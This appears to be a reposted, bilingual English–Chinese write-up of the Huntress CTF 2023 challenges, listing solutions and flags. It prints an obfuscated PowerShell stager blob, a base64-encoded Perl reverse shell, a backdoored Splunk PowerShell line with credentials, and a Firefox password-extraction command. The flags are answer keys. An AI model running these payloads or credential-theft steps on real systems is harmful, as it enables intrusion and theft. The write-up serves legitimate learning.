Huntress CTF 2023 — Write-up

WriteUp 12个月前 admin
74 0 0

Welcome to a write-up of the Huntress 2023 CTF. I took part in this CTF as a member of The Taggart Institute team along with:
欢迎阅读 Huntress 2023 CTF 的文章。我作为 Taggart Institute 团队的一员参加了这次 CTF,同时参加的还有:

Do check them out, they are much smarter than me. Also join the Taggart Discord for additional brain wrinkles.
一定要看看他们,他们比我聪明得多。还可以加入 Taggart Discord 以获得额外的大脑皱纹。

Obligatory certification sharing:
强制性认证分享:

Huntress CTF 2023 — Write-up
You love to see it.
你喜欢看到它。

Contents 内容

Below will be a link to each day, feel free to use them to jump around:
下面将是一个每天的链接,请随意使用它们来跳转:

Day 1 第1天

Day 1 challenges were pretty tame and were just a warm-up for the CTF. The first day challenges were:
第一天的挑战非常温和,只是CTF的热身。第一天的挑战是:

  • Technical Support 技术支持
  • Read The Rules 阅读规则
  • Notepad 记事本
  • String Cheese 奶酪串
  • Query Code 查询代码
  • Zerion 齐亚

Technical Support required you to join the Discord server for this CTF. Once joined, the flag was in the #ctf-open-ticket channel.
技术支持要求您加入此 CTF 的 Discord 服务器。一旦加入,旗帜就在 #ctf 开放票频道中。

The flag was: flag{a98373a74abb8c5ebb8f5192e034a91c}
标志是:flag{a98373a74abb8c5ebb8f5192e034a91c}

Read The Rules required you to read the rules of the CTF. Upon reading the rules you’d stumble upon the following hint: If you look closely, you can even find a flag on this page. With this in mind using View Page Source, you’d find the flag inside an HTML comment.
阅读规则要求您阅读 CTF 的规则。阅读规则后,您会偶然发现以下提示:如果您仔细观察,您甚至可以在此页面上找到一个标志。考虑到这一点,使用查看页面源,您会在 HTML 注释中找到该标志。

The flag was: flag{90bc54705794a62015369fd8e86e557b}
标志是:flag{90bc54705794a62015369fd8e86e557b}

The Notepad challenge required you to download and open a file. Once opened, the flag would be right there.
记事本挑战要求您下载并打开文件。一旦打开,旗帜就在那里。

Huntress CTF 2023 — Write-up
The content of the Notepad file.
记事本文件的内容。

The flag was: flag{2dd41e3da37ef1238954d8e7f3217cd8}
标志是:flag{2dd41e3da37ef1238954d8e7f3217cd8}

String Cheese, as its named suggested, required you to run strings on the downloaded file.
顾名思义,String Cheese 需要您在下载的文件 strings 上运行。

Huntress CTF 2023 — Write-up
Using strings and grep to obtain the flag.
使用 strings 和 grep 获取标志。

The flag was: flag{f4d9f0f70bf353f2ca23d81dcf7c9099}
标志是:flag{f4d9f0f70bf353f2ca23d81dcf7c9099}

Query Code required you to read a QR code. CyberChef has a neat utility for reading QR codes:
查询代码需要您读取二维码。CyberChef 有一个用于读取二维码的简洁实用程序:

Huntress CTF 2023 — Write-up
QR parser. QR 解析器。

The flag was: flag{3434cf5dc6a865657ea1ec1cb675ce3b}
标志是:flag{3434cf5dc6a865657ea1ec1cb675ce3b}

The Zerion challenge was an encoded PHP file, the script provided the steps to decode the string via the following function: base64_decode(strrev(str_rot13($L66Rgr[1])))
Zerion 挑战是一个编码的 PHP 文件,该脚本提供了通过以下函数解码字符串的步骤:base64_decode(strrev(str_rot13($L 66Rgr[1])))

To get the flag you needed to:
要获得标志,您需要:

  • ROT 13 “decrypt” the encoded string,
    ROT 13 “解密”编码的字符串,
  • then reverse the string, 然后反转字符串,
  • and finally, base64 decode the string.
    最后,Base64 对字符串进行解码。

Once done the flag could be easily found in the source code.
完成后,可以很容易地在源代码中找到该标志。

Huntress CTF 2023 — Write-up
Using CyberChef and his recipes to decode the string.
使用 CyberChef 及其配方来解码字符串。

The flag was: flag{af10370d485952897d5183aa09e19883}
标志是:flag{af10370d485952897d5183aa09e19883}

And with that, the first day was over.
就这样,第一天结束了。

Day 2 第2天

Day 2 challenges were: 第二天的挑战是:

  • Book By Its Covers 书籍封面
  • HumanTwo 人类二
  • Hot Off The Press 热点新闻

The challenge file for Book By Its Covers had the .zip file extension. Running the file command on it resulted in it being actually a PNG file. Opening the file in any photo editor revealed the flag.
Book By Its Covers的挑战文件具有.zip文件扩展名。在其上运行 file 命令导致它实际上是一个 PNG 文件。在任何照片编辑器中打开文件都会显示该标志。

Huntress CTF 2023 — Write-up
CybeChef has a recipe for optical character recognition which can be useful in case you don’t want to transcribe the text of an image.
CybeChef 有一个光学字符识别的配方,如果您不想转录图像的文本,它会很有用。

Shout out to Ninceur, as he was the one to solve this challenge for our team.
向 Ninceur 大喊大叫,因为他是为我们团队解决这一挑战的人。

The flag was: flag{f8d32a346745a6c4bf4e9504ba5308f0}
标志是:flag{f8d32a346745a6c4bf4e9504ba5308f0}

HumanTwo required you to find the flag hidden in one file out of a thousand. The first step of finding the flag was to find where the files differed, the Linux tool diff would be the best candidate to figure this out.
HumanTwo要求你找到隐藏在一千个文件中的一个文件中的标志。找到标志的第一步是找到文件的不同之处,Linux 工具 diff 将是解决这个问题的最佳候选者。

Huntress CTF 2023 — Write-up
Output of the diff command.
diff 命令的输出。

After that, a simple grep -r "String.Equals" . would output that line for each challenge file. One of the output strings was longer than the others, and converting the string from hex resulted in the flag.
之后,一个简单的 grep -r "String.Equals" . 将为每个质询文件输出该行。其中一个输出字符串比其他字符串长,将字符串从十六进制转换为会导致标志。

Huntress CTF 2023 — Write-up
Output from CyberChef. CyberChef 的输出。

The flag was: flag{6ce6f6a15dddb0ebb332bfaf2b0b85d1}
标志是:flag{6ce6f6a15dddb0ebb332bfaf2b0b85d1}

Hot Of The Press was a malder solely due to the fact that it was a UHarc archive. It first required me to find a UHarc tool which wasn’t backdoored, Taggart provided me with this useful GitHub link. After that, the binary required the file to have the .uha extension even though in the help menu it’s mentioned to be optional, and finally, the binary required the password to be passed before the UHarc file name.
Hot Of The Press 之所以成为 malder,仅仅是因为它是 UHarc 档案馆。它首先需要我找到一个没有后门的 UHarc 工具,Taggart 为我提供了这个有用的 GitHub 链接。之后,二进制文件要求文件具有 .uha 扩展名,即使在帮助菜单中提到它是可选的,最后,二进制文件要求在 UHarc 文件名之前传递密码。

The correct syntax for decompression:
解压缩的正确语法:

Tecuha.exe x -pwinfected hot_off_the_press.uha

With that, you obtain a PowerShell script. The next step was to deobfuscate the whole script. Of note was the following section of the PowerShell script:
这样,你就可以获得一个 PowerShell 脚本。下一步是对整个脚本进行反混淆。值得注意的是 PowerShell 脚本的以下部分:

Huntress CTF 2023 — Write-up
This part of the script would first base64 decode the obfuscated part and then Gzip decompress it before executing it.
脚本的这一部分将首先对混淆部分进行 base64 解码,然后在执行之前对其进行 Gzip 解压缩。

To speed up the process of deobfuscation you can use PowerShell to deobfuscate itself. For example, inputting this into PowerShell (text from the picture above):
若要加快反混淆过程,可以使用 PowerShell 对自身进行反混淆。例如,将其输入到 PowerShell 中(上图中的文本):

(('H4sI'+'AIeJ'+'G2UC/+1X'+'bU/jOBD+3l9hrS'+'IlkU{0}'+'VFvb{1}IiFdWqD'+'bPRJKS8vR'+'brUKy'+'TR168TFcQplb//7'+'jfNSygJ73{1}lI94F'+'IVvwyMx4/M'+'7YfT9PYl5TH'+'hH7sku8VUnxd'+'T3gRMTT/ku'+'/fWUSjS3Mzp'+'oX7zCWHxBjby+UR'+'jzwaTw4OWq'+'kQ{1}M'+'u8XW2'+'DtJM{1}'+'omtGI'+'TFM8he5nIGAnbP'+'rOfiSf'+'Cfat2qb8W'+'uPFW{0}rlufP'+'gOzYcaD'+'GTrnvKbeq/'+'SWj0tC/ftXN8U5'+'9Uj2+ST2'+'WGHp/nUiIqgFjuk'+'l+mGrCi/USDN2'+'hvuAJn8rqJY'+'13G9VBn'+'HhTcNHa'+'ChyQMx4'+'kul'+'nZ{0}{1}a'+'AT{1}Wcr0kZyUUMHa'+'tdwX0'+'7CAQkiW6RsTI'+'/nkx+N8bF'+'3{0}00'+'ljS'+'CaieWIPiyD'+'2JFfUiq'+'n704YNC'+'D6QS1+l{0}Q'+'OJyYJoq'+'t+AIM{0}U4Zs8'+'i/MWO4c'+'Fsi91olY1sJpbpS'+'mBYG'+'9Jl1OjxIG'+'eSa+jOO'+'5kl'+'g4pcngl'+'n5UalMy7'+'yJvPq'+'3o6eZs2mX'+'3zgbAHTX6PK'+'{1}Zr'+'qHp'+'GYRBy'+'f2JBdrbGoXIgVz'+'sgGbaNGe/Yf'+'1SmP1UhP1V'+'u0U'+'e8ZDToP'+'JRn0r'+'7tr0pj38q{1}'+'ReTuIjmNI'+'YjtaxF1G/'+'zFPjuWjAl{1}{1}GR'+'7UUc9{1}9Qy8'+'GIDgCB'+'q{1}nFb4qKZ6oHU'+'dUbnSbKWUB'+'CNvHiCb'+'oFQbbfO'+'xMHjJD78QORAhd3'+'sYs'+'1aa4O6'+'CU{0}nb'+'{1}upxdtVFIbz{1}v'+'SSzSTXF7+hbpg8c'+'gsIgdJ7QYs'+'lPJs6r+4K6T'+'Mkl9{0}5Glu'+'Yn5{1}5zFtC'+'0eJ1KkPgYVIbj'+'o{0}8'+'GnHlOIWO'+'QzDaC57'+'tOwnF5/Fo+Wxx'+'juG7S0wnhgj8'+'Kh{0}1Wq'+'CPQ0Swuz2g'+'fZiZYMIpTJjosT5'+'oV4'+'OBS7I'+'8st{0}4RAf8HRc'+'hPkGa+Q'+'KSHZchP'+'D3WdcWmRIhcTDR6'+'GM2fVfnHhy'+'6uTOtAQ'+'UwTGyvTVur'+'qXKfi0+P'+'W8sVI4WAGVwCI'+'lQn'+'AgeNb0{1}ftv{0}Dxjj'+'Q6dlh+/lvbyX'+'9/K/{0}22X+XG'+'vHr'+'RZ0mnV635'+'0N7'+'+6d'+'Pmob8sR'+'bf{0}gc+/2j'+'O6vT'+'ufHt856786'+'dO6lz{1}e5i'+'e302D2/PjuxV'+'tzFMr'+'xqfFqP{0}3nQU3'+'c1G'+'9zXmzq+'+'YGzn4P8b'+'iM7f'+'Rwf85lk'+'4+Nh8w5'+'36Q1Z17P6vn7'+'WP8h1gW2R/n+0'+'m2g8UuZ'+'M{0}M3kN7UYyHh'+'T17M5+aw22'+'ch1+GvZO{0}oc3+bF'+'+FX2jz'+'PmifrIOWvTq'+'nNhse'+'D91Ba+iPwsPD'+'D2ZlPKCx3G1M1{1}W'+'+qwhS'+'RWP+p/'+'2tS+Al6'+'ud4'+'Ipl5DC8H5HTl'+'FX3C'+'xUnB1{0}qcKg3DU'+'{1}x/'+'ASIGhvQYCXR5sd'+'mMcV+RxJzSIUP'+'NeaOisYNO'+'5tVzNZNsBM0'+'H9lh2HRyM'+'0{1}u8{0}{0}O7rH'+'oKcShnVu1ut1ZD'+'7le7q+3htfj6'+'pbX4cm3ktix'+'FHjNwNtZZZt2s'+'0CkxjDfHC9'+'8H{1}unK{0}xB7C'+'Tyce'+'4H0AvlOfukrCJ'+'ucs20A'+'i5Vt8'+'u{1}R'+'fghcHVc/Vq+'+'D{0}FPQxA7'+'c{1}{1}0q/rzFxrX0'+'+uz6TZOnIC8z/AX'+'/mDwPfb8YfVVC1a'+'wcoCfd'+'jzseiN/bIX'+'DpUYmCf'+'aRhDPKHwQtAFB'+'tmK8gqP{0}gbpsWn'+'Hspnq'+'dxx8'+'emlmODf2GZMc5'+'4PA'+'AA=')-f'L','E')

Would yield: 将产生:

H4sIAIeJG2UC/+1XbU/jOBD+3l9hrSIlkULVFvbEIiFdWqDbPRJKS8vRbrUKyTR168TFcQplb//7jfNSygJ73ElI94FIVvwyMx4/M7YfT9PYl5THhH7sku8VUnxdT3gRMTT/ku/fWUSjS3MzpoX7zCWHxBjby+URjzwaTw4OWqkQEMu8XW2DtJMEomtGITFM8he5nIGAnbPrOfiSfCfat2qb8WuPFWLrlufPgOzYcaDGTrnvKbeq/SWj0tC/ftXN8U59Uj2+ST2WGHp/nUiIqgFjukl+mGrCi/USDN2hvuAJn8rqJY13G9VBnHhTcNHaChyQMx4kulnZLEaATEWcr0kZyUUMHatdwX07CAQkiW6RsTI/nkx+N8bF3L00ljSCaieWIPiyD2JFfUiqn704YNCD6QS1+lLQOJyYJoqt+AIMLU4Zs8i/MWO4cFsi91olY1sJpbpSmBYG9Jl1OjxIGeSa+jOO5klg4pcngln5UalMy7yJvPq3o6eZs2mX3zgbAHTX6PKEZrqHpGYRByf2JBdrbGoXIgVzsgGbaNGe/Yf1SmP1UhP1Vu0Ue8ZDToPJRn0r7tr0pj38qEReTuIjmNIYjtaxF1G/zFPjuWjAlEEGR7UUc9E9Qy8GIDgCBqEnFb4qKZ6oHUdUbnSbKWUBCNvHiCboFQbbfOxMHjJD78QORAhd3sYs1aa4O6CULnbEupxdtVFIbzEvSSzSTXF7+hbpg8cgsIgdJ7QYslPJs6r+4K6TMkl9L5GluYn5E5zFtC0eJ1KkPgYVIbjoL8GnHlOIWOQzDaC57tOwnF5/Fo+WxxjuG7S0wnhgj8KhL1WqCPQ0Swuz2gfZiZYMIpTJjosT5oV4OBS7I8stL4RAf8HRchPkGa+QKSHZchPD3WdcWmRIhcTDR6GM2fVfnHhy6uTOtAQUwTGyvTVurqXKfi0+PW8sVI4WAGVwCIlQnAgeNb0EftvLDxjjQ6dlh+/lvbyX9/K/L22X+XGvHrRZ0mnV6350N7+6dPmob8sRbfLgc+/2jO6vTufHt856786dO6lzEe5ie302D2/PjuxVtzFMrxqfFqPL3nQU3c1G9zXmzq+YGzn4P8biM7fRwf85lk4+Nh8w536Q1Z17P6vn7WP8h1gW2R/n+0m2g8UuZMLM3kN7UYyHhT17M5+aw22ch1+GvZOLoc3+bF+FX2jzPmifrIOWvTqnNhseD91Ba+iPwsPDD2ZlPKCx3G1M1EW+qwhSRWP+p/2tS+Al6ud4Ipl5DC8H5HTlFX3CxUnB1LqcKg3DUEx/ASIGhvQYCXR5sdmMcV+RxJzSIUPNeaOisYNO5tVzNZNsBM0H9lh2HRyM0Eu8LLO7rHoKcShnVu1ut1ZD7le7q+3htfj6pbX4cm3ktixFHjNwNtZZZt2s0CkxjDfHC98HEunKLxB7CTyce4H0AvlOfukrCJucs20Ai5Vt8uERfghcHVc/Vq+DLFPQxA7cEE0q/rzFxrX0+uz6TZOnIC8z/AX/mDwPfb8YfVVC1awcoCfdjzseiN/bIXDpUYmCfaRhDPKHwQtAFBtmK8gqPLgbpsWnHspnqdxx8emlmODf2GZMc54PAAA=

Which is a base64 encoded string. The next steps were to base64 decode the string, save it as a file with the .gz extension, and then decompress it with gzip to obtain yet another stage.
这是一个 base64 编码的字符串。接下来的步骤是 base64 解码字符串,将其保存为 .gz 带有扩展名的文件,然后解 gzip 压缩它以获得另一个阶段。

The final stage of the payload contains this line:
有效负载的最后阶段包含以下行:

Huntress CTF 2023 — Write-up
Yet another base64 encoded string.
另一个 base64 编码的字符串。

After base64 decoding that line we obtain a URL, decoding the URL we obtain the flag.
在 base64 解码该行后,我们得到一个 URL,解码 URL 后,我们得到标志。

Huntress CTF 2023 — Write-up
The final URL and flag with it.
最终 URL 和标记。

The flag was: flag{dbfe5f755a898ce5f2088b0892850bf7}
标志是:flag{dbfe5f755a898ce5f2088b0892850bf7}

Shout out to Ninceur, as he was the one to solve this for our team.
向 Ninceur 大喊大叫,因为他是为我们的团队解决这个问题的人。

And with that day 2 ends.
随着那一天,2 结束了。

Day 3 第3天

Day 3 challenges were: 第三天的挑战是:

  • BaseFFFF+1 基地FFFF+1
  • Traffic 交通

BaseFFFF+1, as its name suggests, is a text file which was base65536 encoded. There are various tools to decode this, even pip offers base65536 decoders, but I found this website which after inputting the text resulted in the flag.
BaseFFFF+1,顾名思义,是一个 base65536 编码的文本文件。有各种工具可以解码它,即使 pip 提供了 base65536 解码器,但我发现这个网站在输入文本后导致了标志。

The flag was: flag{716abce880f09b7cdc7938eddf273648}
标志是:flag{716abce880f09b7cdc7938eddf273648}

The Traffic challenge offers you a hint to look for a “sketchy website”. With this in mind, the intended solution is to either install rita or zeek, but the unintended way is more fun. To get the flag the unintended way, you’d first need to use 7zip to unzip the .7z challenge file, after that, you’d need to run the gzip -d * on the extracted files, and finally, use the hint given in the challenge and find the sketchy site with grep -r "sketchy" . . This would result in the following website sketchysite.github.io , visiting that website led to the flag for this challenge.
流量挑战为您提供了寻找“粗略网站”的提示。考虑到这一点,预期的解决方案是安装 rita 或 zeek ,但意外的方式更有趣。要以意想不到的方式获取标志,您首先需要用于 7zip 解压缩挑战文件,之后,您需要在提取的文件上运行,最后, gzip -d * 使用 .7z 挑战中给出的提示并使用 grep -r "sketchy" . .这将导致以下网站 sketchysite.github.io ,访问该网站会导致此挑战的标志。

The flag was: flag{8626fe7dcd8d412a80d0b3f0e36afd4a}
标志是:flag{8626fe7dcd8d412a80d0b3f0e36afd4a}

P.S. For the intended way, I suggest using rita and generating an HTML report. The report will contain a list of visited sites and our sketchy site will be one of them.
P.S. 对于预期的方式,我建议使用 rita 并生成 HTML 报告。该报告将包含访问过的网站列表,我们的粗略网站将是其中之一。

With that day 3 is done.
从那天开始,3 就完成了。

Day 4 第4天

Day 4 challenges were: 第四天的挑战是:

  • CaesarMirror 凯撒镜子
  • I Wont Let You Down
    我不会让你失望的

CaesarMirror was a combination of ROT13 (Caesar cipher) and reversing of strings. CyberChef made short work of it:
CaesarMirror 是 ROT13(Caesar 密码)和字符串反转的组合。CyberChef 对此做了简短的工作:

Huntress CTF 2023 — Write-up
Using ROT13 and Reverse to obtain the flag.
使用 ROT13 和 Reverse 获取标志。

The flag was: flag{julius_in_a_reflection}
标志是:flag{julius_in_a_reflection}

I Wont Let You Down was a rickroll. Jokes aside, visiting the provided website gave a hint to use Nmap. Nmap showed port 8888 open, and connecting to that port with Netcat led to the flag.
《我不会让你失望》是一部《摇滚乐》。撇开玩笑不谈,访问提供的网站给出了使用 Nmap 的提示。Nmap 显示端口 8888 已打开,使用 Netcat 连接到该端口会导致该标志。

Huntress CTF 2023 — Write-up
Nmap finds port 8888. Nmap 查找端口 8888。
Huntress CTF 2023 — Write-up
Obtaining the flag with Netcat.
使用 Netcat 获取标志。

The flag was: flag{93671c2c38ee872508770361ace37b02}
标志是:flag{93671c2c38ee872508770361ace37b02}

With that day 4 was over.
那天 4 结束了。

Day 5 第5天

Day 5 challenges were: 第5天的挑战是:

  • PHP Stager PHP格式
  • Dialtone 拨号音

PHP Stager was an obfuscated PHP script. You can use PHP to deobfuscate the payload the same way PowerShell was used in a previous challenge. To deobfuscate the payload use an online PHP compiler like this one, and input the code to obtain a new stage:
PHP Stager 是一个混淆的 PHP 脚本。可以使用 PHP 对有效负载进行反混淆处理,就像在上一个质询中使用 PowerShell 一样。要对有效负载进行反混淆,请使用像这样的在线 PHP 编译器,并输入代码以获取新阶段:

Huntress CTF 2023 — Write-up
Decoding the $gbaylYLd6204 string.
解码 $gbaylYLd 6204 字符串。

The output of this script is a base64 encoded string. Base64 decoding the string leads to yet another base64 encoded string:
此脚本的输出是 base64 编码的字符串。Base64 对字符串进行解码会导致另一个 Base64 编码的字符串:

$back_connect_p="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7CiRpYWRkcj1pbmV0X2F0b24oJEFSR1ZbMF0pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsKc29ja2V0KFNPQ0tFVCwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllKCJFcnJvcjogJCFcbiIpOwpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7Cm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOwpvcGVuKFNURE9VVCwgIj4mU09DS0VUIik7Cm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsKbXkgJHN0ciA9IDw8RU5EOwpiZWdpbiA2NDQgdXVlbmNvZGUudXUKRjlGUUE5V0xZOEM1Qy0jLFEsVjBRLENEVS4jLFUtJilFLUMoWC0mOUM5IzhTOSYwUi1HVGAKYAplbmQKRU5ECnN5c3RlbSgnL2Jpbi9zaCAtaSAtYyAiZWNobyAke3N0cmluZ307IGJhc2giJyk7CmNsb3NlKFNURElOKTsKY2xvc2UoU1RET1VUKTsKY2xvc2UoU1RERVJSKQ==

Decoding that string led to a reverse shell which contained uuencoded data. Decoding that data with this website results in the flag.
对该字符串进行解码会导致包含 uuen编码数据的反向 shell。使用此网站解码该数据会导致该标志。

The flag was: flag{9b5c4313d12958354be6284fcd63dd26}
标志是:flag{9b5c4313d12958354be6284fcd63dd26}

Dialtone was a .wav file, the sound corresponded to a sequence of key presses. You can use this GitHub repository to convert the audio file to a sequence of numbers.
Dialtone是一个 .wav 文件,声音对应于一系列按键。您可以使用此 GitHub 存储库将音频文件转换为数字序列。

The resulting number sequence was:
得到的数字规则为:

13040004482820197714705083053746380382743933853520408575731743622366387462228661894777288573

Converting the sequence of numbers to hexadecimal and decoding it resulted in the flag.
将数字序列转换为十六进制并对其进行解码会产生标志。

Huntress CTF 2023 — Write-up
CyberChef is pretty useful, ngl.
CyberChef 非常有用,ngl。

The flag was: flag{6c733ef09bc4f2a4313ff63087e25d67}
标志是:flag{6c733ef09bc4f2a4313ff63087e25d67}

With that day 5 was over.
那天 5 结束了。

Day 6 第6天

Day 6 challengers were: 第6天的挑战者是:

  • Layered Security 分层安全
  • Backdoored Splunk 后门 Splunk

Layered Security was a gimp file which had multiple layers. The flag was in the 7th layer from the top.
Layered Security 是一个具有多层的 gimp 文件。旗帜位于顶部的第 7 层。

Huntress CTF 2023 — Write-up
The flag is pretty visible.
这面旗帜非常明显。

The flag was: flag{9a64bc4a390cb0ce31452820ee562c3f}
标志是:flag{9a64bc4a390cb0ce31452820ee562c3f}

Backdoored Splunk consisted of two parts. The first part was a container you could start and the second part was a downloadable file. When visiting the link for the container you’d get a “missing authorization header” warning, using that we could grep for a valid header with:
后门Splunk由两部分组成。第一部分是可以启动的容器,第二部分是可下载的文件。访问容器的链接时,您会收到“缺少授权标头”警告,使用该警告,我们可以使用以下命令 grep 获取有效的标头:

$ grep -r "Authorization" Splunk_TA_windows/
Splunk_TA_windows/bin/powershell/nt6-health.ps1:$OS = @($html = (Invoke-WebRequest http://chal.ctf.games:$PORT -Headers @{Authorization=("Basic YmFja2Rvb3I6dXNlX3RoaXNfdG9fYXV0aGVudGljYXRlX3dpdGhfdGhlX2RlcGxveWVkX2h0dHBfc2VydmVyCg==")} -UseBasicParsing).Content

The first result contains a PowerShell command which when executed outputted a base64 encoded string. Base64 decoding the string resulted in the flag.
第一个结果包含一个 PowerShell 命令,该命令在执行时输出一个 base64 编码的字符串。Base64 对字符串进行解码时,将出现该标志。

The flag was: flag{60bb3bfaf703e0fa36730ab70e115bd7}
标志是:flag{60bb3bfaf703e0fa36730ab70e115bd7}

This concluded day 6. 第6天到此结束。

DAY 7 第7天

Day 7 challenges were: 第7天的挑战是:

  • Comprezz 康普雷兹
  • Dumpster Fire 垃圾箱火灾

Comprezz was just compressed data. To decompress the data, you first needed to rename the file to have a .z extension and then decompress it with the Linux tool uncompress . After decompressing the data the flag could be obtained by simply using cat on the newly generated file.
Comprezz 只是压缩数据。要解压缩数据,您首先需要将文件重命名为 .z 具有扩展名,然后使用 Linux 工具 uncompress 对其进行解压缩。解压缩数据后,只需在 cat 新生成的文件上使用即可获得标志。

The flag was: flag{196a71490b7b55c42bf443274f9ff42b}
标志是:flag{196a71490b7b55c42bf443274f9ff42b}

Dumpster Fire had a hint about “Check it out quick before the foxes get to it” and “any cool passwords or anything”. These 2 hints suggest that our target was the passwords saved by Firefox. A useful tool for this job was firepwd, which can be found here.
Dumpster Fire 有一个关于“在狐狸到达它之前快速检查一下”和“任何很酷的密码或任何东西”的提示。这 2 个提示表明我们的目标是 Firefox 保存的密码。这项工作的一个有用工具是 firepwd,可以在这里找到。

With that the command to obtain the flag was:
这样,获取标志的命令是:

 python3 firepwd/firepwd.py -d home/challenge/.mozilla/firefox/bc1m1zlr.default-release/

The flag was: flag{35446041dc161cf5c9c325a3d28af3e3}
标志是:flag{35446041dc161cf5c9c325a3d28af3e3}

And this concluded day 7.
第7天就这样结束了。

Day 8 第8天

Day 8 challenges were: 第8天的挑战是:

  • Chicken Wings 鸡翅
  • Where am I? 我在哪里?

The name of the challenge Chicken Wings was a hint for Wingdings, which in turn is a series of dingbat fonts that convert letters to symbols. Dcode.fr was used to convert the symbols back to letters. As a side note, dcode.fr is a useful tool to decrypt/decode most encryption/encoding algorithms.
挑战的名称 Chicken Wings 是对 Wingdings 的暗示,而 Wdings 又是一系列将字母转换为符号的 dingbat 字体。Dcode.fr 用于将符号转换回字母。顺便说一句,dcode.fr 是解密/解码大多数加密/编码算法的有用工具。

The flag was: flag{e0791ce68f718188c0378b1c0a3bdc9e}
标志是:flag{e0791ce68f718188c0378b1c0a3bdc9e}

The Where am I? challenge required you to run exiftool on the provided image. After running exiftool you’d be presented with a base64 encoded string inside the “Image Description” tag. Base64 decoding the strings resulted in the flag.
我在哪里?质询要求您在提供的映像 exiftool 上运行。运行 exiftool 后,您会在“图像描述”标记内看到一个 base64 编码的字符串。Base64 对字符串进行解码时,会生成该标志。

The flag was: flag{b11a3f0ef4bc170ba9409c077355bba2) — the missing curly brace “}” is intended.
标志是:flag{b11a3f0ef4bc170ba9409c077355bba2) — 缺少的大括号“}”是故意的。

With that day 8 was finished.
那天,8结束了。

Day 9 第9天

Day 9 challenges were: 第9天的挑战是:

  • F12 F12型
  • Wimble 

F12 required you to check the source code of the website. Inspecting the source code for the button lead to another endpoint of the website called /capture_the_flag.html , visiting that endpoint, and again inspecting the source code resulted in the flag.
F12 要求您检查网站的源代码。检查按钮的源代码会导致网站的另一个端点,访问 /capture_the_flag.html 该端点,然后再次检查源代码,从而产生该标志。

Huntress CTF 2023 — Write-up
The flag on the /capture_the_flag.html endpoint.
/capture_the_flag.html 终结点上的标志。

The flag was: flag{03e8ba07d1584c17e69ac95c341a2569}
标志是:flag{03e8ba07d1584c17e69ac95c341a2569}

Wimble was a let down, the challenge was exactly the same as this one from NahamCon 2023 (even the same flag!). The intended way of solving it was to run PECmd.exe from Eric Zimmerman’s tools and use grep to get the flag.
温布尔令人失望,挑战与 NahamCon 2023 的挑战完全相同(甚至是同一面旗帜!解决它的预期方法是从埃里克·齐默尔曼(Eric Zimmerman)的工具中运行 PECmd.exe 并用于 grep 获取标志。

Huntress CTF 2023 — Write-up
You needed to 7zip extract the initial file, 7zip extract the extracted file, and unzip the final archive to get the .\fetch directory!
您需要 7zip 提取初始文件,7zip 提取提取的文件,然后解压缩最终存档才能获得 .\fetch 目录!

The flag was: FLAG{97F33C9783C21DF85D79D613B0B258BD}
标志是:FLAG{97F33C9783C21DF85D79D613B0B258BD}

And this concluded day 9.
第9天就这样结束了。

Day 10 第10天

Day 10 challenges were: 第10天的挑战是:

  • Baking 
  • VeeBeeEee VeeBeeEee的

Baking consisted of a container, which when visited prompted you to put in a cookie to bake. Once in the oven, a timer would start counting down until the cookie was ready. Luckily enough, the timer is calculated from the value inside a cookie appropriately named in_oven . The cookie was base64 encoded, and base64 decoding the cookie would result in a string like this:
烘焙由一个容器组成,当访问该容器时,会提示您放入饼干进行烘烤。一旦进入烤箱,计时器就会开始倒计时,直到饼干准备好。幸运的是,计时器是根据适当命名 in_oven 的 cookie 中的值计算得出的。cookie 是 base64 编码的,base64 解码 cookie 将产生如下所示的字符串:

{
  "recipe": "Magic Cookies",
  "time": "10/11/2023, 15:41:21"
}

The flag can be obtained by simply changing the time field to a time in the past and base64 encoding the string. Something like this:
只需将 time 字段更改为过去的时间并对字符串进行 base64 编码即可获得该标志。像这样的东西:

echo '{"recipe": "Magic Cookies", "time": "10/11/2022, 15:41:21"}' | base64 -w 100

Taking the output of the command above and putting it in the in_oven cookie field yielded the flag.
获取上述命令的输出并将其放入 in_oven cookie 字段中会产生标志。

The flag was: flag{c36fb6ebdbc2c44e6198bf4154d94ed4}
标志是:flag{c36fb6ebdbc2c44e6198bf4154d94ed4}

VeeBeeEee was a malicious wscript. To get the flag, you first needed to deobfuscate the initial stage which could be done using CyberChef and the Microsoft Script Decoder recipe.
VeeBeeEee 是一个恶意的 wscript。要获得标志,您首先需要对初始阶段进行反混淆,这可以使用 CyberChef 和 Microsoft Script Decoder 配方来完成。

The deobfuscated script would still have a layer of obfuscation as visible in the picture below:
反混淆的脚本仍将具有一层混淆,如下图所示:

Huntress CTF 2023 — Write-up
Commands are still obfuscated.
命令仍处于模糊处理状态。

You could remove the ampersand symbol & to get a better overview on the code. Sublime text can easily replace all the instances of a symbol using Ctrl + H .
您可以删除 & 符号 & 以更好地了解代码。Sublime text 可以很容易地使用 Ctrl + H .

Huntress CTF 2023 — Write-up
Removed part of the obfuscation.
删除了部分混淆。

After the removal of some obfuscation, a link appeared to Pastebin. The link was https://pastebin.com/raw/SiYGwwcz and it contained the flag.
在消除一些混淆后,出现了一个指向 Pastebin 的链接。链接已 https://pastebin.com/raw/SiYGwwcz,其中包含标志。

The flag was: flag{ed81d24958127a2adccfb343012cebff}
标志是:flag{ed81d24958127a2adccfb343012cebff}

And with this day 10 concluded.
这一天,10结束了。

Day 11 第11天

Day 11 challenges were: 第11天的挑战是:

  • Operation Not Found 未找到操作
  • Snake Eater 食蛇者

Operation Not Found was an OSINT challenge where you’d, similarly to GeoGuessr, be given an image and needed to put a marker on the map that corresponded to the location shown in the image.
Operation Not Found 是一项 OSINT 挑战,与 GeoGuessr 类似,您将获得一张图像,并且需要在地图上放置一个与图像中显示的位置相对应的标记。

Huntress CTF 2023 — Write-up
After a spin, you’d see the following building.
旋转一圈后,您会看到以下建筑。

Using Google for a reverse image look-up would yield the name of the building: Georgia Tech: Price Gilbert Library. A quick Google Maps search would show the exact location of the building, and putting the marker in that spot resulted in the flag.
